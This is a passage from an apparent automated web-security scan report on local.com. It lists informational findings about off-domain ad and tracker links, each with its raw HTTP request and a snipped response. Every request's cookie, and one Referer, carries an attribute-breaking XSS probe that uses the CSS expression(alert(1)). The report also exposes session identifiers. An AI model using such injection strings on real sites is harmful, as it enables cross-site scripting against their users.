localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748870273?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748870273?" border="0" alt="" /></a>
...[SNIP]...

8.55. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748883062&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748883062?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748883062?

Request

GET /dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748883062?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748883062?" border="0" alt="" /></a>
...[SNIP]...

8.56. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748883062?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748883062?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748883062?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748883062?" border="0" alt="" /></a>
...[SNIP]...

8.57. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748870273&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748870273?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748870273?

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748870273&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748870273?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748870273?" border="0" alt="" /></a>
...[SNIP]...

8.58. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748883062?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748883062?

Request

GET /dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748883062?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=7;tile=7;city=dallas_tx;sz=310x101;ord=1296748883062?" border="0" alt="" /></a>
...[SNIP]...

8.59. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748882748?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748882748?

Request

GET /dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.60. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&sz=491x223&ord=1296748812638&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748812638?
http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748812638?

Request

GET /dart/?ag=True&p=locm.sp&sz=491x223&ord=1296748812638&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; session_start_time=1296748820317; k_visit=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Date: Thu, 03 Feb 2011 15:59:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.61. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748883062&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748883062?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748883062?

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748883062?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748883062?" border="0" alt="" /></a>
...[SNIP]...

8.62. http://www.local.com/dialogs/register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/register.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dialogs/register.aspx?email=

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks
http://www.omniture.com/

Request

GET /dialogs/register.aspx?email= HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

8.63. http://www.local.com/events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/events/?location=Dallas%2c+TX

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=none
http://static.eventful.com/images/block/I0-001/001/000/622-4.jpeg
http://static.eventful.com/images/block/I0-001/001/003/000-9.jpeg
http://static.eventful.com/images/block/I0-001/001/343/721-2.jpeg
http://static.eventful.com/images/block/I0-001/001/494/846-9.jpeg
